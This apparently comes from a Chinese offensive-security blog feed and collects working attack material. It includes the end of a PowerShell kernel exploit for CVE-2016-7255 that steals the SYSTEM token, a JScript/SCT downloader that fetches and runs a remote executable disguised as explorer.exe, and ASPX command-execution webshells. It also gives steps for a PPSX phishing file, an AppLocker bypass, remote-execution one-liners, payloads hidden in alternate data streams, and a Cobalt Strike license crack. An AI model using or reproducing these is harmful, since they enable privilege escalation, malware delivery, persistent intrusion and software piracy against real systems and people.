        echo "[+] _EPROCESS list entry: 0x$("{0:X}" -f $SysEprocessPtr)"
        # PsInitialSystemProcess holds a pointer to the SYSTEM _EPROCESS; the
        # echo below performs the same read a second time purely for output.
        $SysEPROCESS = Bitmap-Read -Address $SysEprocessPtr
        echo "[+] SYSTEM _EPROCESS address: 0x$("{0:X}" -f $(Bitmap-Read -Address $SysEprocessPtr))"
        echo "[+] PID: $(Bitmap-Read -Address $($SysEPROCESS+$UniqueProcessIdOffset))"
        echo "[+] SYSTEM Token: 0x$("{0:X}" -f $(Bitmap-Read -Address $($SysEPROCESS+$TokenOffset)))"
        $SysToken = Bitmap-Read -Address $($SysEPROCESS+$TokenOffset)
        
        # Get EPROCESS entry for current process
        echo "`n[>] Leaking current _EPROCESS.."
        echo "[+] Traversing ActiveProcessLinks list"
        # Flink points at the next entry's ActiveProcessLinks; subtracting
        # (UniqueProcessIdOffset + pointer size) yields that _EPROCESS base.
        $NextProcess = $(Bitmap-Read -Address $($SysEPROCESS+$ActiveProcessLinks)) - $UniqueProcessIdOffset - [System.IntPtr]::Size
        while($true) {
            $NextPID = Bitmap-Read -Address $($NextProcess+$UniqueProcessIdOffset)
            if ($NextPID -eq $PID) {
                echo "[+] PowerShell _EPROCESS address: 0x$("{0:X}" -f $NextProcess)"
                echo "[+] PID: $NextPID"
                echo "[+] PowerShell Token: 0x$("{0:X}" -f $(Bitmap-Read -Address $($NextProcess+$TokenOffset)))"
                $PoShTokenAddr = $NextProcess+$TokenOffset
                break
            }
            $NextProcess = $(Bitmap-Read -Address $($NextProcess+$ActiveProcessLinks)) - $UniqueProcessIdOffset - [System.IntPtr]::Size
        }
        
        # Duplicate token!
        # (Pointer copy only -- see the reference-count caveat in .NOTES.)
        echo "`n[!] Duplicating SYSTEM token!`n"
        Bitmap-Write -Address $PoShTokenAddr -Value $SysToken
    }
    
    #==============================================================[Keyboard Functions]
    # See: https://msdn.microsoft.com/en-us/library/ms927178.aspx
    function Sim-KeyDown {
    <#
    .SYNOPSIS
        Injects one key-press (key down) event for virtual-key code $wKey through
        user32!SendInput, using the INPUT/KEYBDINPUT structs compiled above.
    .PARAMETER wKey
        Virtual-key code (e.g. 0x12 = VK_MENU); stored in KEYBDINPUT.wVk.
    .OUTPUTS
        [bool] $true when SendInput reports exactly one event inserted, else $false.
    #>
        param([Int]$wKey)
    
        # dwFlags 0 = no KEYEVENTF_* flags, i.e. a key press; itype 1 = INPUT_KEYBOARD.
        $keyEvent = New-Object KEYBDINPUT
        $keyEvent.wVk     = $wKey
        $keyEvent.dwFlags = 0
    
        $packet       = New-Object INPUT
        $packet.itype = 1
        $packet.U     = $keyEvent
    
        $inserted = [ms16135]::SendInput(1, $packet, [System.Runtime.InteropServices.Marshal]::SizeOf($packet))
        return ($inserted -eq 1)
    }
    
    function Sim-KeyUp {
    <#
    .SYNOPSIS
        Injects one key-release (key up) event for virtual-key code $wKey through
        user32!SendInput, using the INPUT/KEYBDINPUT structs compiled above.
    .PARAMETER wKey
        Virtual-key code (e.g. 0x12 = VK_MENU); stored in KEYBDINPUT.wVk.
    .OUTPUTS
        [bool] $true when SendInput reports exactly one event inserted, else $false.
    #>
        param([Int]$wKey)
    
        # dwFlags 2 = KEYEVENTF_KEYUP; itype 1 = INPUT_KEYBOARD.
        $keyEvent = New-Object KEYBDINPUT
        $keyEvent.wVk     = $wKey
        $keyEvent.dwFlags = 2
    
        $packet       = New-Object INPUT
        $packet.itype = 1
        $packet.U     = $keyEvent
    
        $inserted = [ms16135]::SendInput(1, $packet, [System.Runtime.InteropServices.Marshal]::SizeOf($packet))
        return ($inserted -eq 1)
    }
    
    function Do-AltShiftEsc {
    <#
    .SYNOPSIS
        Replays the chord used to drive the trigger: Alt and Shift pressed and
        held, Esc tapped twice, then Alt and Shift released. Return values of the
        individual SendInput calls are discarded; nothing is output.
    #>
        # Virtual-key / direction pairs in exactly the order they must be sent.
        $chord = @(
            @{ Key = 0x12; Down = $true  }   # VK_MENU   down
            @{ Key = 0x10; Down = $true  }   # VK_SHIFT  down
            @{ Key = 0x1b; Down = $true  }   # VK_ESCAPE down
            @{ Key = 0x1b; Down = $false }   # VK_ESCAPE up
            @{ Key = 0x1b; Down = $true  }   # VK_ESCAPE down
            @{ Key = 0x1b; Down = $false }   # VK_ESCAPE up
            @{ Key = 0x12; Down = $false }   # VK_MENU   up
            @{ Key = 0x10; Down = $false }   # VK_SHIFT  up
        )
        foreach ($step in $chord) {
            if ($step.Down) {
                $null = Sim-KeyDown -wKey $step.Key
            } else {
                $null = Sim-KeyUp -wKey $step.Key
            }
        }
    }
    
    function Do-AltShiftTab {
    <#
    .SYNOPSIS
        Holds Alt and Shift, taps Tab $Count times, then releases Alt and Shift.
    .PARAMETER Count
        Number of Tab taps; zero or a negative value sends only the modifiers.
    #>
        param([Int]$Count)
    
        $null = Sim-KeyDown -wKey 0x12   # VK_MENU  down
        $null = Sim-KeyDown -wKey 0x10   # VK_SHIFT down
    
        $remaining = $Count
        while ($remaining -gt 0) {
            $null = Sim-KeyDown -wKey 0x9    # VK_TAB down
            $null = Sim-KeyUp   -wKey 0x9    # VK_TAB up
            $remaining--
        }
    
        $null = Sim-KeyUp -wKey 0x12     # VK_MENU  up
        $null = Sim-KeyUp -wKey 0x10     # VK_SHIFT up
    }
    
    #==============================================================[Create-Bitmaps]
    # Stage two bitmaps until they sit exactly 0x2000 bytes apart in the session
    # pool: the lower one becomes the "worker" (the object whose size field is
    # corrupted and that is later read/written through), the higher one the
    # "manager". Stage-gSharedInfoBitmap is simply retried until that holds.
    # NOTE(review): there is no retry cap and the bitmaps from a failed pass are
    # never deleted (DeleteObject is not imported anywhere in this script), so an
    # unfavourable pool layout can spin here indefinitely while leaking objects.
    do {
        $Bitmap1 = Stage-gSharedInfoBitmap
        $Bitmap2 = Stage-gSharedInfoBitmap
        if ($Bitmap1.BitmapKernelObj -lt $Bitmap2.BitmapKernelObj) {
            $WorkerBitmap = $Bitmap1
            $ManagerBitmap = $Bitmap2
        } else {
            $WorkerBitmap = $Bitmap2
            $ManagerBitmap = $Bitmap1
        }
        $Distance = $ManagerBitmap.BitmapKernelObj - $WorkerBitmap.BitmapKernelObj
    } while ($Distance -ne 0x2000)
    
    echo "[?] Adjacent large session pool feng shui.."
    echo "[+] Worker  : $('{0:X}' -f $WorkerBitmap.BitmapKernelObj)"
    echo "[+] Manager : $('{0:X}' -f $ManagerBitmap.BitmapKernelObj)"
    echo "[+] Distance: 0x$('{0:X}' -f $Distance)"
    
    # Address of the y-coordinate for the bitmap
    # (worker object + 63: Do-OrAddress aims the arbitrary OR here so the worker's
    # height grows and reads past its real pixel buffer reach the manager object)
    $TargetAddress = $WorkerBitmap.BitmapKernelObj + 63
    
    #==============================================================[Trigger Function]
    function Do-OrAddress {
    <#
    .SYNOPSIS
        Triggers the MS16-135 / CVE-2016-7255 arbitrary kernel OR against $Address.
    .DESCRIPTION
        Registers a window class, creates a parent and a child window, stores
        ($Address - 0x28) in the child's GWLP_ID slot via SetWindowLongPtr(-12)
        (the "spmenu" corruption), re-parents the child to the desktop and then
        replays Alt+Shift+Esc / Alt+Shift+Tab chords while pumping messages so
        that win32k follows the corrupted pointer and ORs a bit at $Address.
        Success is detected by GetBitmapBits on the worker bitmap returning
        0x2000 bytes: $Address is the worker's y-dimension (per the caller), so
        once the OR lands the bitmap reports more pixel data than it really owns.
    .PARAMETER Address
        Kernel address of the byte to OR into (worker bitmap object + 63).
    .NOTES
        Reads $WorkerBitmap from the enclosing scope; publishes the snapshot of
        the worker's bytes in $Global:BytePointer (a 0x2000-byte RWX allocation
        that is never freed) and sets $Script:BugNotTriggered on failure.
        NOTE(review): the early-exit break statements below are not inside a
        loop; PowerShell unwinds such a break to the nearest enclosing loop of
        the caller (or ends the script) -- return is the intended semantics.
        NOTE(review): the 0x28 adjustment and the need for the key chords come
        from the original write-up and cannot be derived from this code alone.
    #>
        param([Int64]$Address)
    
        # Create WNDCLASSEX atom
        $AtomCreate = New-Object ms16135
        $hAtom = $AtomCreate.CustomClass("cve-2016-7255")
        if ($hAtom -eq 0){
            break
        }
    
        echo "`n[?] Creating Window objects"
        $hMod = [ms16135]::GetModuleHandleW([String]::Empty)
        # WS_OVERLAPPEDWINDOW|WS_VISIBLE
        $hWndParent = [ms16135]::CreateWindowExW(0,"cve-2016-7255",[String]::Empty,0x10CF0000,0,0,360,360,[IntPtr]::Zero,[IntPtr]::Zero,$hMod,[IntPtr]::Zero)
        if ($hWndParent -eq 0){
            break
        }
    
        # WS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD
        $hWndChild = [ms16135]::CreateWindowExW(0,"cve-2016-7255","cve-2016-7255",0x50CF0000,0,0,160,160,$hWndParent,[IntPtr]::Zero,$hMod,[IntPtr]::Zero)
        if ($hWndChild -eq 0){
            break
        }
    
        # Align target
        # (compensates for where the kernel dereferences the planted value so the
        # OR hits $Address itself)
        $Address = $Address - 0x28
    
        echo "[+] Corrupting child window spmenu"
        # manipulate child spmenu
        # -12 = GWLP_ID; the planted value is later misused as a menu pointer.
        $CallResult = [ms16135]::SetWindowLongPtr($hWndChild,-12,[IntPtr]$Address)
    
        # Window magic
        # Show the parent, detach the child to the desktop and bring it to the
        # front so the keyboard chords below reach it.
        $CallResult = [ms16135]::ShowWindow($hWndParent,1)
        $hDesktopWindow = [ms16135]::GetDesktopWindow()
        $CallResult = [ms16135]::SetParent($hWndChild,$hDesktopWindow)
        $CallResult = [ms16135]::SetForegroundWindow($hWndChild)
    
        Do-AltShiftTab -Count 4
    
        $CallResult = [ms16135]::SwitchToThisWindow($hWndChild,$true)
    
        Do-AltShiftEsc
    
        # This is a bit messy, but the bug is not easy to trigger
        # while also reliably exiting the loop. Basically we try to
        # trigger the arbitrary "Or" for 3 seconds and then check if
        # it was successful. If not we try up to ten times (should
        # take 2-4 attempts).
        # Pumps this thread's message queue for ~3 s, bouncing focus between
        # parent and child with Alt+Shift+Esc bursts on each message.
        function Trigger-Write {
            $SafeGuard = [diagnostics.stopwatch]::StartNew()
            while ($SafeGuard.ElapsedMilliseconds -lt 3000) {
                $tagMSG = New-Object tagMSG
                if ($([ms16135]::GetMessage([ref]$tagMSG,[IntPtr]::Zero,0,0))) {
                    $CallResult = [ms16135]::SetFocus($hWndParent) #
                    for ($i=0;$i-lt20;$i++){Do-AltShiftEsc}        #
                    $CallResult = [ms16135]::SetFocus($hWndChild)  # Bug triggers here!
                    for ($i=0;$i-lt20;$i++){Do-AltShiftEsc}        #
                    $CallResult = [ms16135]::TranslateMessage([ref]$tagMSG)
                    $CallResult = [ms16135]::DispatchMessage([ref]$tagMSG)
                }
            } $SafeGuard.Stop()
        }
        # 0x2000-byte scratch page (0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = RWX);
        # global because the caller inspects its contents after this returns.
        [IntPtr]$Global:BytePointer = [ms16135]::VirtualAlloc([System.IntPtr]::Zero, 0x2000, 0x3000, 0x40)
        # Success test: GetBitmapBits on the intact worker copies at most its real
        # buffer (width*4 bytes, below 0x2000); a full 0x2000 means the size field
        # was corrupted. The snapshot is taken BEFORE each Trigger-Write, so the
        # hit is observed one iteration after it happens (one extra 3 s burst).
        # $LoopCount is local to this function and starts from $null (-> 1).
        do {
            echo "[+] Trying to trigger arbitrary 'Or'.."
            $ByteRead = [ms16135]::GetBitmapBits($WorkerBitmap.BitmapHandle,0x2000,$BytePointer)
            Trigger-Write
            $LoopCount += 1
        } while ($ByteRead -ne 0x2000 -And $LoopCount -lt 10)
    
        # Clean up
        $CallResult = [ms16135]::DestroyWindow($hWndChild)
        $CallResult = [ms16135]::DestroyWindow($hWndParent)
        $CallResult = [ms16135]::UnregisterClass("cve-2016-7255",[IntPtr]::Zero)
        
        # Because shit happens, or patched
        # (NOTE(review): a hit observed on the 10th iteration also ends with
        # $LoopCount -eq 10 and would be reported as a failure.)
        if ($LoopCount -eq 10) {
            echo "`n[!] Bug did not trigger, try again or patched?`n"
            $Script:BugNotTriggered = 1
        }
    }
    
    Do-OrAddress -Address $TargetAddress
    if ($BugNotTriggered) {
        Return
    }
    
    #==============================================================[Set pvScan0 Manger]
    # Calculate offset
    if ($OSMajorMinor -eq "6.1") {
        $SizeVal = 0x400000770
    } else {
        $SizeVal = 0x400000760
    }
    do {
        $Read64 = [System.Runtime.InteropServices.Marshal]::ReadInt64($BytePointer.ToInt64() + $LoopCount)
        if ($Read64 -eq $SizeVal) {
            $Pointer1 = [System.Runtime.InteropServices.Marshal]::ReadInt64($BytePointer.ToInt64() + $LoopCount + 16)
            $Pointer2 = [System.Runtime.InteropServices.Marshal]::ReadInt64($BytePointer.ToInt64() + $LoopCount + 24)
            if ($Pointer1 -eq $Pointer2) {
                $BufferOffset = $LoopCount + 16
                Break
            }
        }
        $LoopCount += 8
    } while ($LoopCount -lt 0x2000)
    $pvBits = [System.Runtime.InteropServices.Marshal]::ReadInt64($BytePointer.ToInt64() + $BufferOffset)
    $pvScan0 = [System.Runtime.InteropServices.Marshal]::ReadInt64($BytePointer.ToInt64() + $BufferOffset + 8)
    
    # Sanity check, probably unnecessary
    if ($pvScan0 -ne 0) {
        echo "`n[?] Success, reading beyond worker bitmap size!"
        echo "[+] Old manager bitmap pvScan0: $('{0:X}' -f $pvScan0)"
    } else {
        echo "`n[!] Buffer contains invalid data, quitting..`n"
        Return
    }
    
    # Overwrite pointers in buffer
    [System.Runtime.InteropServices.Marshal]::WriteInt64($($BytePointer.ToInt64() + $BufferOffset),$WorkerBitmap.BitmappvScan0)
    [System.Runtime.InteropServices.Marshal]::WriteInt64($($BytePointer.ToInt64() + $BufferOffset + 8),$WorkerBitmap.BitmappvScan0)
    $pvScan0 = [System.Runtime.InteropServices.Marshal]::ReadInt64($BytePointer.ToInt64() + $BufferOffset + 8)
    echo "[+] New manager bitmap pvScan0: $('{0:X}' -f $pvScan0)"
    
    # Overwrite adjacent kernel _SURFOBJ
    $CallResult = [ms16135]::SetBitmapBits($WorkerBitmap.BitmapHandle,0x2000,$BytePointer)
    
    #==============================================================[Elevate]
    Bitmap-Elevate -ManagerBitmap $ManagerBitmap.BitmapHandle -WorkerBitmap $WorkerBitmap.BitmapHandle
    if([String]::IsNullOrEmpty($Application))
    {
    Write-Host "[!] Nothing to do.."  
    }
    else{cmd /c $Application + " " + $Commandline}
    
    }
    

    github地址:戳我
    demo:

    1.gif


  • 05/06/17--05:27: JS下载者 (chan 69772723)
  • var WSHShell = new ActiveXObject("WScript.Shell");
                path = WSHShell.ExpandEnvironmentStrings("%temp%");
                var filepath = path+"/explorer.exe";
                var xhr = new ActiveXObject("MSXML2.XMLHTTP");
                xhr.open("GET","http://x.x.x.x/bd.exe", false);
                xhr.send();
                if (xhr.Status == 200) {
                    var fso = new ActiveXObject("Scripting.FileSystemObject");
                    var stream = new ActiveXObject("ADODB.Stream");
                    stream.Open();
                    stream.Type = 1;
                    stream.Write(xhr.ResponseBody);
                    stream.Position = 0;
                    if (fso.FileExists(filepath)){
                       fso.DeleteFile(filepath);
                    }
                    stream.SaveToFile(filepath);
                    stream.Close();
                    new ActiveXObject("WScript.Shell").Exec(filepath);
                }
    

    SCT:

    <?XML version="1.0"?>
    <scriptlet>
    <registration
        progid="ShortJSRAT"
        classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
        <!-- Learn from Casey Smith @subTee -->
        <script language="JScript">
            <![CDATA[
                var WSHShell = new ActiveXObject("WScript.Shell");
                path = WSHShell.ExpandEnvironmentStrings("%temp%");
                var filepath = path+"/explorer.exe";
                var xhr = new ActiveXObject("MSXML2.XMLHTTP");
                xhr.open("GET","http://x.x.x.x/bd.exe", false);
                xhr.send();
                if (xhr.Status == 200) {
                    var fso = new ActiveXObject("Scripting.FileSystemObject");
                    var stream = new ActiveXObject("ADODB.Stream");
                    stream.Open();
                    stream.Type = 1;
                    stream.Write(xhr.ResponseBody);
                    stream.Position = 0;
                    if (fso.FileExists(filepath)){
                       fso.DeleteFile(filepath);
                    }
                    stream.SaveToFile(filepath);
                    stream.Close();
                    new ActiveXObject("WScript.Shell").Exec(filepath);
                }
    
    
            ]]>
    </script>
    </registration>
    </scriptlet>
    

  • 05/13/17--05:45: Xsl Exec Webshell (aspx) (chan 69772723)
  • 关于使用xsl的webshell以前已经有人发过了,比如aspx的一个webshell如下:

    <%@ Page Language="C#" Debug="true" %>
    <%@ import Namespace="System.IO"%>
    <%@ import Namespace="System.Xml"%>
    <%@ import Namespace="System.Xml.Xsl"%>
    <%
    string xml=@"<?xml version=""1.0""?><root>test</root>";
    string xslt=@"<?xml version='1.0'?>
    <xsl:stylesheet version=""1.0"" xmlns:xsl=""http://www.w3.org/1999/XSL/Transform"" xmlns:msxsl=""urn:schemas-microsoft-com:xslt"" xmlns:zcg=""zcgonvh"">
        <msxsl:script language=""JScript"" implements-prefix=""zcg"">
            <msxsl:assembly name=""mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""/>
            <msxsl:assembly name=""System.Data, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""/>
            <msxsl:assembly name=""System.Configuration, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""/>
            <msxsl:assembly name=""System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""/>
            <![CDATA[function xml() {var c=System.Web.HttpContext.Current;var Request=c.Request;var Response=c.Response;var Server=c.Server;eval(Request.Item['a'],'unsafe');Response.End();}]]>
        </msxsl:script>
    <xsl:template match=""/root"">
        <xsl:value-of select=""zcg:xml()""/>
    </xsl:template>
    </xsl:stylesheet>";
    XmlDocument xmldoc=new XmlDocument();
    xmldoc.LoadXml(xml);
    XmlDocument xsldoc=new XmlDocument();
    xsldoc.LoadXml(xslt);
    XslCompiledTransform xct=new XslCompiledTransform();
    xct.Load(xsldoc,XsltSettings.TrustedXslt,new XmlUrlResolver());
    xct.Transform(xmldoc,null,new MemoryStream());
    
    %>
    

    密码为 a,这个webshell是可以用菜刀连接的,测试碰到这种情况:服务器有安全狗等防护软件,提交的各种数据包可能会拦截,而现在想要做的就是执行命令就可以了,为了方便,写了一个命令执行的webshell,可回显,可改密码,具体代码如下:

    <%@page language="C#"%>
    <%@ import Namespace="System.IO"%>
    <%@ import Namespace="System.Xml"%>
    <%@ import Namespace="System.Xml.Xsl"%>
    <%
    string xml=@"<?xml version=""1.0""?><root>test</root>";
    string xslt=@"<?xml version='1.0'?>
    <xsl:stylesheet version=""1.0"" xmlns:xsl=""http://www.w3.org/1999/XSL/Transform"" xmlns:msxsl=""urn:schemas-microsoft-com:xslt"" xmlns:zcg=""zcgonvh"">
        <msxsl:script language=""JScript"" implements-prefix=""zcg"">
        <msxsl:assembly name=""mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""/>
        <msxsl:assembly name=""System.Data, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""/>
        <msxsl:assembly name=""System.Configuration, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""/>
        <msxsl:assembly name=""System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""/>
            <![CDATA[function xml(){
            var c=System.Web.HttpContext.Current;var Request=c.Request;var Response=c.Response;
            var command = Request.Item['cmd'];
            var r = new ActiveXObject(""WScript.Shell"").Exec(""cmd /c ""+command);
            var OutStream = r.StdOut;
            var Str = """";
            while (!OutStream.atEndOfStream) {
                Str = Str + OutStream.readAll();
                }
            Response.Write(""<pre>""+Str+""</pre>"");
            }]]>
        </msxsl:script>
    <xsl:template match=""/root"">
        <xsl:value-of select=""zcg:xml()""/>
    </xsl:template>
    </xsl:stylesheet>";
    XmlDocument xmldoc=new XmlDocument();
    xmldoc.LoadXml(xml);
    XmlDocument xsldoc=new XmlDocument();
    xsldoc.LoadXml(xslt);
    XsltSettings xslt_settings = new XsltSettings(false, true);
    xslt_settings.EnableScript = true;
    try{
        XslCompiledTransform xct=new XslCompiledTransform();
        xct.Load(xsldoc,xslt_settings,new XmlUrlResolver());
        xct.Transform(xmldoc,null,new MemoryStream());
    }
    catch (Exception e){
        Response.Write("Error");
    }
    %>
    

    密码为cmd,可自己改,测试如下图:

    123.png

    附带一个大马里面的命令执行:

    <%@ Page Language="VB" Debug="true" %>
    <%@ import Namespace="system.IO" %>
    <%@ import Namespace="System.Diagnostics" %>
    
    <script runat="server">      
    
    Sub RunCmd(Src As Object, E As EventArgs)            
      Dim myProcess As New Process()            
      Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)            
      myProcessStartInfo.UseShellExecute = false            
      myProcessStartInfo.RedirectStandardOutput = true            
      myProcess.StartInfo = myProcessStartInfo            
      myProcessStartInfo.Arguments=xcmd.text            
      myProcess.Start()            
    
      Dim myStreamReader As StreamReader = myProcess.StandardOutput            
      Dim myString As String = myStreamReader.Readtoend()            
      myProcess.Close()            
      mystring=replace(mystring,"<","&lt;")            
      mystring=replace(mystring,">","&gt;")            
      result.text= vbcrlf & "<pre>" & mystring & "</pre>"    
    End Sub
    
    </script>
    
    <html>
    <body>    
    <form runat="server">        
    <p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label>        
    <asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>        
    <p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label>        
    <asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>        
    <p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button>        
    <p><asp:Label id="result" runat="server"></asp:Label>       
    </form>
    </body>
    </html>
    


  • 05/18/17--19:39: 前端黑在线工具 XSS’OR (chan 69772724)
  • 这是一个在线免费的前端黑工具,目前主要包含 3 大模块: 1. Encode/Decode 加解密模块,包含: […]

  • 06/20/17--23:41: 构造PPSX钓鱼文件 (chan 69772723)
  • 之前出现了一种新型的钓鱼攻击手法,即通过PPT在未开启宏的情况下执行程序。关于这个,Freebuf也有相关文章进行介绍:《新型PPT钓鱼攻击分析》《无需宏,PPT也能用来投递恶意程序》。但是文中都未介绍怎么制作这种文件,所以今天在这里分享一下制作该文件的方法,希望大家了解并对此进行防御。

    首先,创建一个普通的PPTX文件,随便填入一些内容,如下图:
    1.png

    之后插入一个动作按钮,具体位置如下图:
    2.png

    这里要选择空白的那个,选择以后,在页面中拉出一个触发位置,之后会弹出动作设置的界面:
    3.png

    选择鼠标移过->运行程序:
    4.png

    选择要运行的程序可在后面直接加参数,如计算器,之后点击确定。
    5.png
    现在显示为一个有色区域,所以要对他进行设置,右键->设置形状格式,将填充和线条颜色改成无
    6.png

    最后将文件保存为PPSX文件即可。

    最终效果:

    2.gif



    XSS’OR 开源了。采用 BSD 开源协议,很宽松,不限制传播与商业化,留下作者版权就好。在下面 […]

  • 07/07/17--00:28: Bypass AppLocker With MSXSL.EXE (chan 69772723)
  • 关于XSLT之前已经有几篇文章进行介绍了,如 Hack With XSLT、XXE with XSL、Xsl Exec Webshell,今天分享一个通过MSXSL.exe绕过Applocker的方法。
    msxsl.exe是微软用于命令行下处理XSL的一个程序,所以通过它,我们可以执行JavaScript进而执行系统命令。下载地址为:戳我

    msxsl.exe 需要接受两个文件,XML及XSL文件,命令行操作如下:

    msxsl.exe demo.xml exec.xsl
    

    demo.xml

    <?xml version="1.0"?>
    <?xml-stylesheet type="text/xsl" href="exec.xsl" ?>
    <customers>
    <customer>
    <name>Microsoft</name>
    </customer>
    </customers>
    

    exec.xsl

    <?xml version='1.0'?>
    <xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt"
    xmlns:user="http://mycompany.com/mynamespace">
     
    <msxsl:script language="JScript" implements-prefix="user">
       function xml(nodelist) {
    var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe");
       return nodelist.nextNode().xml;
     
       }
    </msxsl:script>
    <xsl:template match="/">
       <xsl:value-of select="user:xml(.)"/>
    </xsl:template>
    </xsl:stylesheet>
    

    1.gif

    同样的,msxsl.exe可以远程加载,具体方式如下:

    msxsl https://evi1cg.me/scripts/demo.xml https://evi1cg.me/scripts/exec.xsl
    

  • 07/24/17--01:59: powershell 通过IE下载文件 (chan 69772723)
  • $ie = New-Object -Com internetExplorer.Application
    $ie.Navigate("https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe")
    
    #------------------------------
    #Wait for Download Dialog box to pop up
    Sleep 5
    while($ie.Busy){Sleep 1}
    #------------------------------
    
    #Hit "S" on the keyboard to hit the "Save" button on the download box
    $obj = new-object -com WScript.Shell
    $obj.AppActivate('Internet Explorer')
    $obj.SendKeys('s')
    
    #Hit "Enter" to save the file
    $obj.SendKeys('{Enter}')
    
    #Closes IE Downloads window
    $obj.SendKeys('{TAB}')
    $obj.SendKeys('{TAB}')
    $obj.SendKeys('{TAB}')
    $obj.SendKeys('{Enter}')
    
    

    原文:戳我


  • 08/03/17--18:25: Some Tricks (chan 69772723)
  • 远程执行sct的另一种姿势

    cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct
    

    detail:https://posts.specterops.io/wsh-injection-a-case-study-fd35f79d29dd

    命令行下载姿势1

    bitsadmin /rawreturn /transfer getfile http://download.sysinternals.com/files/PSTools.zip c:\p.zip
    bitsadmin /rawreturn /transfer getpayload http://download.sysinternals.com/files/PSTools.zip c:\p.zip
    bitsadmin /transfer myDownLoadJob /download /priority normal "http://download.sysinternals.com/files/PSTools.zip" "c:\p.zip"
    

    命令行下载姿势2

    certutil -urlcache -split -f http://192.168.254.102:80/a.txt b.txt
    

    清除缓存 certutil -urlcache -split -f http://192.168.254.102:80/a.txt delete

    命令行执行远程JS

    certutil -urlcache -split -f http://192.168.254.102:80/a a.js && cscript a.js &&  del a.js && certutil -urlcache -split -f http://192.168.254.102:80/a delete
    

    命令行远程执行VBS

    certutil -urlcache -split -f http://192.168.254.102:80/abc a.vbs && cscript a.vbs &&  del a.vbs && certutil -urlcache -split -f http://192.168.254.102:80/abc delete
    

    命令行远程执行HTA

    mshta http://192.168.254.102/1.hta
    

  • 08/31/17--19:23: 渗透中的ADS (chan 69772723)
  • 为了测试,在这里使用Cobaltstrike 生成一个exe,用来查看文件是否上传成功,并可以顺利执行,每次上传文件以后,服务器自动删除,如下图:
    1504229593529.png

    PS: meterpreter会话是通过powershell web_delivery获取的

    尝试创建文件夹成功:
    1504229703126.png

    将文件上传至特殊目录:

    upload /tmp/beacon.exe \\\\.\\c:\\WINDOWS\\debug\\WIA\\123:aa.exe
    

    upload /tmp/beacon.exe 123:aa.exe也可以,这是写到了当前目录。

    上传以后进入shell 可使用 dir /r来查看
    1504229856372.png

    可以看到成功写入了,之后使用WMIC来执行,命令如下:

    wmic process call create \\.\c:\WINDOWS\debug\WIA\123:aa.exe
    wmic process call create C:\WINDOWS\debug\WIA\123:aa.exe //当前目录使用,需要绝对路径
    

    也可以使用msf来执行

    execute -cH -f "\\\\.\\c:\\WINDOWS\\debug\\WIA\\123:aa.exe"
    

    1504229982741.png

    到cobal里面可以看到会话。

    如果有权限的话,可使用certutil下载文件到ADS

    certutil -urlcache -split -f http://url/test.exe \\.\c:\WINDOWS\debug\WIA\123:aa.exe
    

    删除certutil缓存

    certutil.exe -urlcache -split -f http://url/test.exe delete
    

    测试时发现一个有趣的东西,使用test:
    1.gif

    使用nul
    test.gif

    测试发现,如果想要dir /s 里面看不到ADS,可以使用的文件为:

    \\.\C:\test\COM1
    \\.\C:\test\COM2
    ...
    \\.\C:\test\COM9
    \\.\C:\test\nul
    

    并且这些文件是不可以直接删除的,要删除的话使用如下命令:

    del \\.\C:\test\nul
    

    再分享一下怎么样带参数执行ADS文件,其实可以借助于MSF,具体命令如下

    execute -iH -f "c:\\文件路径\\123:1.exe" -a "文件参数"
    

    效果如下图:
    1504257989079.png

    使用msf删除ADS,可直接使用rm 加绝对路径即可,如下图:
    1504258209654.png


  • 09/06/17--22:50: cobaltstrike3.8 破解版 (chan 69772723)
  • C568E2BB-3369-4EB1-993A-EBEA12790162.png
    之前一直想下载3.8,但是没下载到,看到小伙伴留言发了一个试用版的链接(安全性未知)。
    B49E21D6-8C9D-405B-AA10-B0B3B3275F95.png

    链接:https://f001.backblazeb2.com/file/thedarkcloud/cobaltstrike/cobaltstrike-trial.tgz

    然后就下载了一下,发现这个并不是破解版。如下图:
    E0C37677-323F-4D1A-A00D-0CC6068D73A1.png

    所以就对其进行了简单的修改,并把方法分享给大家,以便大家使用。
    首先,对cobaltstrike.jar进行解压,解压以后找到common\License.class,使用jad进行反编译。

    C:\Users\evi1cg\Desktop\jad>jad License.class
    Parsing License.class... Generating License.jad
    

    之后编辑License.jad文件,修改以下参数。找到life,修改为65535L:

    4E7F56F9-72A6-4038-BAD5-778BC8FAF54C.png

    之后将License.jad重命名为License.java,置于解压以后的CobaltStrike的根目录,之后使用javac进行编译。

    javac -classpath . License.java
    

    编译以后得到License.class,使用winrar打开未解压的CobaltStrike,使用修改后的License.class替换原来的License.class即可。

    如果不想打开的时候弹框,可使用以下License.java进行编译

    package common;
    
    import aggressor.Prefs;
    
    public class License
    {
    
        public License()
        {
        }
    
        private static long getTimeSinceStart()
        {
            Prefs prefs = Prefs.getPreferences();
            today = System.currentTimeMillis();
            start = prefs.getLongNumber("cobaltstrike.start.int", 0L);
